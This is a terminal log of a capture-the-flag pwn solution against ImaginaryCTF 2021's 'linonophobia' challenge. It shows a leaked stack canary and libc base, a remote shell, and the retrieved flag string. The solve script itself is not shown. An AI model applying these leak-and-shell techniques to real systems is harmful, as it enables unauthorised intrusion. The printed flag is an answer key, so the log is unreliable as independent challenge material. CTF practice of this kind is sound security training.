mito@ubuntu:~/CTF/ImaginaryCTF_2021/Pwn_linonophobia_200$ python3 solve.py r
[*] '/home/mito/CTF/ImaginaryCTF_2021/Pwn_linonophobia_200/linonophobia'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to chal.imaginaryctf.org on port 42006: Done
[*] '/usr/lib/x86_64-linux-gnu/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
canary = 0x24952fa8f3080800
libc_leak = 0x7f44e2ccd0b3
libc_base = 0x7f44e2ca6000
[*] Switching to interactive mode

$ id
uid=1000 gid=1000 groups=1000
$ ls -l
total 20
-rwxr--r-- 1 nobody nogroup    44 Jul 19 23:03 flag.txt
-rwxr-xr-x 1 nobody nogroup 12784 Jul 24 13:19 run
$ cat flag.txt
ictf{str1ngs_4r3_null_t3rm1n4t3d!_b421ba9f}